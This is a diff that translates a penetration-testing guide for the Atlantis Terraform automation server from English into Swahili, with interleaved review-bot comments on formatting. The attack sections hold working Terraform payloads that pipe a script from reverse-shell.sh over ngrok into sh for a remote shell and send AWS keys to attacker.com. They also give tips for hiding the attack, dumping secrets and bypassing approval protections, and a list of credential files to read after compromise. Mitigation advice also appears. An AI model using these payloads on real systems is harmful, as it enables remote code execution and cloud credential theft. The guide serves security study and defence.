> [!WARNING]
-> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
+> Katika hali yoyote, kutoka kwa mtazamo wa washambuliaji, **akaunti ya Atlantis** itakuwa moja ya **ya kuvutia** **kuvunjwa**.
#### Webhooks
-Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
+Atlantis inatumia kwa hiari [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) kuthibitisha kwamba **webhooks** inazopokea kutoka kwa mwenyeji wako wa Git ni **halali**.
-One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
+Njia moja ya kuthibitisha hii ingekuwa **kuruhusu maombi kuja tu kutoka kwa IPs** za mwenyeji wako wa Git lakini njia rahisi ni kutumia Webhook Secret.
-Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
+Kumbuka kwamba isipokuwa unatumia seva ya github au bitbucket ya kibinafsi, utahitaji kufichua mwisho wa webhook kwa Mtandao.
> [!WARNING]
-> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
+> Atlantis itakuwa **ikifichua webhooks** ili seva ya git iweze kutuma habari. Kutoka kwa mtazamo wa washambuliaji itakuwa ya kuvutia kujua **kama unaweza kutuma ujumbe**.
#### Provider Credentials
-[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html)
+[Kutoka kwenye nyaraka:](https://www.runatlantis.io/docs/provider-credentials.html)
-Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
+Atlantis inafanya Terraform kwa kuendesha tu **amri `terraform plan` na `apply`** kwenye seva **ambayo Atlantis inahifadhiwa**. Kama unavyofanya Terraform kwa ndani, Atlantis inahitaji akreditif za mtoa huduma wako maalum.
-It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
+Ni juu yako jinsi unavyoweza [kutoa akreditif](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) kwa mtoa huduma wako maalum kwa Atlantis:
-- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
-- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
- - [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
- - [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
-- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
-- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
-- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
+- Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) na [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) zina mifumo yao wenyewe ya akreditif za mtoa huduma. Soma nyaraka zao.
+- Ikiwa unafanya kazi na Atlantis katika wingu basi mawingu mengi yana njia za kutoa ufikiaji wa API ya wingu kwa programu zinazofanya kazi ndani yao, mfano:
+- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Tafuta "EC2 Role")
+- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
+- Watumiaji wengi huweka mabadiliko ya mazingira, mfano. `AWS_ACCESS_KEY`, ambapo Atlantis inafanya kazi.
+- Wengine huunda faili za usanidi zinazohitajika, mfano. `~/.aws/credentials`, ambapo Atlantis inafanya kazi.
+- Tumia [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) kupata akreditif za mtoa huduma.
> [!WARNING]
-> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
+> **Container** ambapo **Atlantis** inafanya **kazi** itakuwa na uwezekano mkubwa **kuhifadhi akreditif za kibali** kwa watoa huduma (AWS, GCP, Github...) ambao Atlantis inasimamia kupitia Terraform.
#### Web Page
-By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
+Kwa kawaida Atlantis itafanya kazi **ukurasa wa wavuti katika bandari 4141 kwenye localhost**. Ukurasa huu unaruhusu tu kuwezesha/kuzima atlantis apply na kuangalia hali ya mpango wa repos na kuziweka wazi (hauruhusu kubadilisha mambo, hivyo si ya manufaa sana).
-You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
+Huenda usiione ikifichuliwa kwa mtandao, lakini inaonekana kwa kawaida **hakuna akreditif zinazohitajika** kuifikia (na ikiwa zipo `atlantis`:`atlantis` ndio **za kawaida**).
### Server Configuration
-Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
+Usanidi wa `atlantis server` unaweza kuainishwa kupitia bendera za mistari ya amri, mabadiliko ya mazingira, faili ya usanidi au mchanganyiko wa tatu.
-- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
-- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
+- Unaweza kupata [**hapa orodha ya bendera**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) zinazosaidiwa na seva ya Atlantis
+- Unaweza kupata [**hapa jinsi ya kubadilisha chaguo la usanidi kuwa mabadiliko ya mazingira**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
-Values are **chosen in this order**:
+Thamani zinachaguliwa **katika mpangilio huu**:
-1. Flags
-2. Environment Variables
-3. Config File
+1. Bendera
+2. Mabadiliko ya Mazingira
+3. Faili ya Usanidi
> [!WARNING]
-> Note that in the configuration you might find interesting values such as **tokens and passwords**.
+> Kumbuka kwamba katika usanidi unaweza kupata thamani za kuvutia kama **tokens na nywila**.
#### Repos Configuration
-Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
+Mikakati fulani inaathiri **jinsi repos inavyosimamiwa**. Hata hivyo, inawezekana kwamba **kila repo inahitaji mipangilio tofauti**, hivyo kuna njia za kuainisha kila repo. Hii ndiyo kipaumbele:
-1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
- 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
-2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
-3. **Default** values
+1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) faili. Faili hii inaweza kutumika kuainisha jinsi atlantis inavyopaswa kutenda kwa repo. Hata hivyo, kwa kawaida funguo fulani haziwezi kuainishwa hapa bila bendera fulani zinazoruhusu.
+1. Huenda ikahitajika kuruhusiwa na bendera kama `allowed_overrides` au `allow_custom_workflows`
+2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): Unaweza kuipitia na bendera `--repo-config` na ni yaml inayopanga mipangilio mipya kwa kila repo (regexes zinasaidiwa)
+3. **Thamani za Kawaida**
**PR Protections**
-Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
+Atlantis inaruhusu kuashiria ikiwa unataka **PR** kuidhinishwa na mtu mwingine (hata kama hiyo haijakubaliwa katika ulinzi wa tawi) na/au kuwa **`mergeable`** (ulinzi wa tawi umepita) **kabla ya kuendesha apply**. Kutoka kwa mtazamo wa usalama, kuweka chaguo zote mbili ni mapendekezo.
-In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
+Katika kesi `allowed_overrides` ni Kweli, mipangilio hii inaweza **kufutwa kwenye kila mradi na faili ya `/atlantis.yml`**.
**Scripts**
-The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.**
+Usanidi wa repo unaweza **kuainisha scripts** za kuendesha [**kabla**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) na [**baada**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) **workflow inatekelezwa.**
-There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file.
+Hakuna chaguo la kuruhusu **kuainisha** scripts hizi katika **repo `/atlantis.yml`** faili.
**Workflow**
-In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
-Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
+Katika usanidi wa repo (usanidi wa upande wa seva) unaweza [**kuainisha workflow mpya ya kawaida**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), au [**kuunda workflows mpya za kawaida**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** Unaweza pia **kuainisha** ni **repos** zipi zinaweza **kufikia** zile **mpya** zilizoundwa.\
+Kisha, unaweza kuruhusu faili ya **atlantis.yaml** ya kila repo ku **ainisha workflow ya kutumia.**
> [!CAUTION]
-> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\
-> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
+> Ikiwa bendera [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) `allow_custom_workflows` imewekwa kuwa **Kweli**, workflows zinaweza **kuainishwa** katika faili ya **`atlantis.yaml`** ya kila repo. Pia inaweza kuwa muhimu kwamba **`allowed_overrides`** pia inasisitiza **`workflow`** ili **kufuta workflow** ambayo itatumika.\
+> Hii itatoa **RCE katika seva ya Atlantis kwa mtumiaji yeyote anayeweza kufikia repo hiyo**.
>
> ```yaml
> # atlantis.yaml
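Review bot: Nested list items lose their indentation in this hunk, which flattens the structure: `+- [AWS EC2 Roles]` and `+- [GCE Instance Service Accounts]` were sub-items of the "running Atlantis in a cloud" bullet, and `+1. Huenda ikahitajika kuruhusiwa na bendera kama ...` was a sub-item of step 1 and now renders as a second top-level `1.`, so the priority list reads 1, 1, 2, 3. Restore the two leading spaces on those lines. Two smaller points: `True` is the literal value of the `allowed_overrides` / `allow_custom_workflows` server-side flags and should stay as `True` rather than being translated to `Kweli`, and in the caution block "inasisitiza `workflow`" reads as "emphasizes" where the original means that `allowed_overrides` must also list `workflow` (something like "inajumuisha `workflow`" keeps that meaning).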
@@ -126,19 +126,18 @@ Then, you can allow the **atlantis.yaml** file of each repo to **specify the wor
**Conftest Policy Checking**
-Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include:
+Atlantis inasaidia kuendesha **server-side** [**conftest**](https://www.conftest.dev/) **policies** dhidi ya matokeo ya mpango. Matumizi ya kawaida ya hatua hii ni pamoja na:
-- Denying usage of a list of modules
-- Asserting attributes of a resource at creation time
-- Catching unintentional resource deletions
-- Preventing security risks (ie. exposing secure ports to the public)
+- Kukataa matumizi ya orodha ya moduli
+- Kuashiria sifa za rasilimali wakati wa kuunda
+- Kukamata kufutwa kwa rasilimali zisizokusudiwa
+- Kuzuia hatari za usalama (yaani, kufichua bandari salama kwa umma)
-You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
+Unaweza kuangalia jinsi ya kuipanga katika [**nyaraka**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
### Atlantis Commands
-[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
-
+[**Katika nyaraka**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) unaweza kupata chaguzi unazoweza kutumia kuendesha Atlantis:
```bash
# Get help
atlantis help
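Review bot: The blank line between the lead-in sentence and the ```bash fence is dropped here (`-` blank line removed before `+[**Katika nyaraka**](...)`), and the same pattern repeats in every hunk of this file. CommonMark lets a fence interrupt a paragraph, so it still renders, but the rest of the corpus keeps a blank line around fences; restore it for consistency rather than letting the translation tool strip it.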
@@ -161,94 +160,82 @@ atlantis apply [options] -- [terraform apply flags]
## --verbose
## You can also add extra terraform options
```
-
### Attacks
> [!WARNING]
-> If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
-
-You can fix it by running:
+> Ikiwa wakati wa unyakuzi unakutana na **kosa** hili: `Error: Error acquiring the state lock`
+Unaweza kulitatua kwa kukimbia:
```
atlantis unlock #You might need to run this in a different PR
atlantis plan -- -lock=false
```
+#### Atlantis plan RCE - Mabadiliko ya usanidi katika PR mpya
-#### Atlantis plan RCE - Config modification in new PR
-
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
-
-You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file:
+Ikiwa una ruhusa ya kuandika juu ya hifadhi, utaweza kuunda tawi jipya ndani yake na kuunda PR. Ikiwa unaweza **kutekeleza `atlantis plan`** (au labda inatekelezwa kiotomatiki) **utaweza kufanya RCE ndani ya seva ya Atlantis**.
+Unaweza kufanya hivi kwa kufanya [**Atlantis ipokee chanzo cha data cha nje**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Weka tu payload kama ifuatavyo katika faili ya `main.tf`:
```json
data "external" "example" {
- program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
+program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
+**Shambulio la Siri**
-**Stealthier Attack**
-
-You can perform this attack even in a **stealthier way**, by following this suggestions:
-
-- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
+Unaweza kufanya shambulio hili hata kwa njia **ya siri zaidi**, kwa kufuata mapendekezo haya:
+- Badala ya kuongeza rev shell moja kwa moja kwenye faili ya terraform, unaweza **kupakia rasilimali ya nje** ambayo ina rev shell:
```javascript
module "not_rev_shell" {
- source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
-
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
-- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
-- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
+- Katika rasilimali ya nje, tumia kipengele cha **ref** kuficha **kodi ya rev shell ya terraform katika tawi** ndani ya repo, kitu kama: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+- **Badala** ya kuunda **PR kwa master** ili kuanzisha Atlantis, **unda matawi 2** (test1 na test2) na uunde **PR kutoka moja hadi nyingine**. Unapokamilisha shambulio, tu **ondoa PR na matawi**.
#### Atlantis plan Secrets Dump
-You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file:
-
+Unaweza **dump secrets zinazotumiwa na terraform** ukikimbia `atlantis plan` (`terraform plan`) kwa kuweka kitu kama hiki katika faili la terraform:
```json
output "dotoken" {
- value = nonsensitive(var.do_token)
+value = nonsensitive(var.do_token)
}
```
+#### Atlantis apply RCE - Mabadiliko ya usanidi katika PR mpya
-#### Atlantis apply RCE - Config modification in new PR
+Ikiwa una ruhusa ya kuandika juu ya hifadhi, utaweza kuunda tawi jipya na kuzalisha PR. Ikiwa unaweza **kufanya `atlantis apply` utaweza RCE ndani ya seva ya Atlantis**.
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
+Hata hivyo, kwa kawaida utahitaji kupita baadhi ya ulinzi:
-However, you will usually need to bypass some protections:
-
-- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
- - Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
-- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
- - By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
-
-Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-You just need to make sure some payload like the following ones ends in the `main.tf` file:
+- **Inayoweza kuunganishwa**: Ikiwa ulinzi huu umewekwa katika Atlantis, unaweza tu kufanya **`atlantis apply` ikiwa PR inaweza kuunganishwa** (hii inamaanisha kuwa ulinzi wa tawi unahitaji kupitishwa).
+- Angalia [**kupita kwa ulinzi wa tawi**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
+- **Imeidhinishwa**: Ikiwa ulinzi huu umewekwa katika Atlantis, **mtumiaji mwingine lazima aidhinishe PR** kabla hujaweza kufanya `atlantis apply`
+- Kwa kawaida unaweza kutumia [**token ya Gitbot kupita ulinzi huu**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
+Kufanya **`terraform apply` kwenye faili ya Terraform yenye nia mbaya na** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
+Unahitaji tu kuhakikisha kuwa payload kama hizi zinaishia kwenye faili ya `main.tf`:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
- provisioner "local-exec" {
- command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
- }
+provisioner "local-exec" {
+command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
- provisioner "local-exec" {
- command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
- }
+provisioner "local-exec" {
+command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+}
}
```
-
-Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
+Fuata **mapendekezo kutoka kwa mbinu ya awali** ili kufanikisha shambulio hili kwa **njia ya siri**.
#### Terraform Param Injection
-When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
-
+Wakati wa kuendesha `atlantis plan` au `atlantis apply`, terraform inatekelezwa chini, unaweza kupitisha amri kwa terraform kutoka atlantis kwa kuandika kitu kama:
```bash
atlantis plan --
atlantis plan -- -h #Get terraform plan help
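Review bot: The warning callout changes its rendering in this hunk: `+> Ikiwa wakati wa unyakuzi unakutana na **kosa** hili: ...` is now followed directly by `+Unaweza kulitatua kwa kukimbia:` with no blank line, so that sentence becomes a lazy continuation of the blockquote and is drawn inside the `[!WARNING]` box while the fence below it is not; the original kept it as a separate paragraph, so reinsert the blank line. Second, the protection names are translated away: `**Inayoweza kuunganishwa**` and `**Imeidhinishwa**` were `**Mergeable**` and `**Approved**`, which map to the `mergeable` / `approved` apply requirements in the Atlantis config; keep the identifier (with a Swahili gloss in parentheses if wanted) so the reader can connect the prose to the flag values, and restore the indentation of the "branch protections bypasses" and "Gitbot token" sub-bullets, which are now top-level items. Third, the indentation inside the Terraform snippets is stripped (`+program = [...]`, `+provisioner "local-exec" {`, `+command = ...`); HCL tolerates it, but the blocks become hard to read, so keep the original `terraform fmt` layout, and while here the fences are tagged `json` / `javascript` for what is HCL, `hcl` would be the right tag.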
@@ -256,7 +243,6 @@ atlantis plan -- -h #Get terraform plan help
atlantis apply --
atlantis apply -- -h #Get terraform apply help
```
-
Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
#### Custom Workflow
@@ -289,96 +275,94 @@ This possibility was mentioned in a previous section:
#### Bypass plan/apply protections
If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**.
-
```yaml
repos:
- - id: /.*/
- apply_requirements: []
+- id: /.*/
+apply_requirements: []
```
-
#### PR Hijacking
-If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
+Ikiwa mtu atatuma **`atlantis plan/apply` maoni kwenye ombi lako halali la kuvuta,** itasababisha terraform kuendesha wakati hutaki.
-Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE.
+Zaidi ya hayo, ikiwa huna mipangilio katika **branch protection** ya kuomba **kuangalia upya** kila PR wakati **commit mpya inatolewa** kwake, mtu anaweza **kuandika mipangilio ya uharibifu** (angalia hali za awali) katika mipangilio ya terraform, kuendesha `atlantis plan/apply` na kupata RCE.
-This is the **setting** in Github branch protections:
+Hii ni **mipangilio** katika ulinzi wa matawi ya Github:
.png>)
#### Webhook Secret
-If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
+Ikiwa umeweza **kuiiba webhook secret** inayotumika au ikiwa **hakuna webhook secret** inayotumika, unaweza **kuita webhook ya Atlantis** na **kuitisha amri za atlantis** moja kwa moja.
#### Bitbucket
-Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
+Bitbucket Cloud haifai **webhook secrets**. Hii inaweza kuruhusu washambuliaji **kuiga maombi kutoka Bitbucket**. Hakikisha unaruhusu tu IP za Bitbucket.
-- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
-- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
-- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
+- Hii inamaanisha kwamba **mshambuliaji** anaweza kufanya **maombi ya uongo kwa Atlantis** ambayo yanaonekana kana kwamba yanatoka Bitbucket.
+- Ikiwa unataja `--repo-allowlist` basi wanaweza tu kuiga maombi yanayohusiana na hizo repos hivyo uharibifu mkubwa wanaoweza kufanya ni kupanga/kutumia kwenye repos zako.
+- Ili kuzuia hili, ruhusu [anwani za IP za Bitbucket](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (angalia Anwani za IPv4 za Nje).
### Post-Exploitation
-If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
+Ikiwa umeweza kupata ufikiaji wa seva au angalau umepata LFI kuna mambo ya kuvutia unapaswa kujaribu kusoma:
-- `/home/atlantis/.git-credentials` Contains vcs access credentials
-- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
-- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file
- - Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
-- `/proc/1/environ` Env variables
-- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
+- `/home/atlantis/.git-credentials` Inashikilia akreditif za ufikiaji wa vcs
+- `/atlantis-data/atlantis.db` Inashikilia akreditif za ufikiaji wa vcs na maelezo zaidi
+- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Faili ya hali ya terraform
+- Mfano: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
+- `/proc/1/environ` Mabadiliko ya mazingira
+- `/proc/[2-20]/cmdline` Cmd line ya `atlantis server` (inaweza kuwa na data nyeti)
### Mitigations
-#### Don't Use On Public Repos
+#### Usitumie Kwenye Repos za Umma
-Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
+Kwa sababu mtu yeyote anaweza kutoa maoni kwenye ombi za kuvuta za umma, hata na mipango yote ya usalama iliyopo, bado ni hatari kuendesha Atlantis kwenye repos za umma bila mipangilio sahihi ya mipangilio ya usalama.
-#### Don't Use `--allow-fork-prs`
+#### Usitumie `--allow-fork-prs`
-If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
+Ikiwa unafanya kazi kwenye repo ya umma (ambayo haitashauriwa, angalia hapo juu) huwezi kuweka `--allow-fork-prs` (inarejelea kuwa si kweli) kwa sababu mtu yeyote anaweza kufungua ombi la kuvuta kutoka kwa fork yao hadi repo yako.
#### `--repo-allowlist`
-Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
+Atlantis inahitaji uweze kutaja orodha ya ruhusa ya repos itakazokubali webhooks kutoka kupitia bendera ya `--repo-allowlist`. Kwa mfano:
-- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
-- Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
-- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
-- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
+- Repos maalum: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
+- Shirika lako lote: `--repo-allowlist=github.com/runatlantis/*`
+- Kila repo katika usakinishaji wako wa GitHub Enterprise: `--repo-allowlist=github.yourcompany.com/*`
+- Repos zote: `--repo-allowlist=*`. Inatumika wakati uko kwenye mtandao uliohifadhiwa lakini hatari bila pia kuweka webhook secret.
-This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
+Bendera hii inahakikisha usakinishaji wako wa Atlantis haujatumika na repos usizodhibiti. Angalia `atlantis server --help` kwa maelezo zaidi.
-#### Protect Terraform Planning
+#### Linda Mipango ya Terraform
-If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
+Ikiwa washambuliaji wanawasilisha maombi ya kuvuta na msimbo wa uharibifu wa Terraform uko katika mfano wako wa tishio basi lazima uwe na ufahamu kwamba idhini za `terraform apply` hazitoshi. Inawezekana kuendesha msimbo wa uharibifu katika `terraform plan` kwa kutumia [chanzo cha data cha `external`](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) au kwa kutaja mtoa huduma wa uharibifu. Msimbo huu unaweza kisha kuhamasisha akreditif zako.
-To prevent this, you could:
+Ili kuzuia hili, unaweza:
-1. Bake providers into the Atlantis image or host and deny egress in production.
-2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
-3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
+1. Kuunda mtoa huduma ndani ya picha ya Atlantis au mwenyeji na kukataa egress katika uzalishaji.
+2. Tekeleza itifaki ya rejista ya mtoa huduma ndani na kukataa egress ya umma, kwa njia hiyo unadhibiti nani ana ufikiaji wa kuandika kwenye rejista.
+3. Badilisha [mipangilio ya repo upande wa seva](https://www.runatlantis.io/docs/server-side-repo-config.html)'s hatua ya `plan` ili kuthibitisha dhidi ya matumizi ya watoa huduma au vyanzo vya data vilivyokatazwa au PRs kutoka kwa watumiaji wasioruhusiwa. Unaweza pia kuongeza uthibitisho wa ziada katika hatua hii, kwa mfano, kuhitaji "thumbs-up" kwenye PR kabla ya kuruhusu `plan` kuendelea. Conftest inaweza kuwa ya manufaa hapa.
#### Webhook Secrets
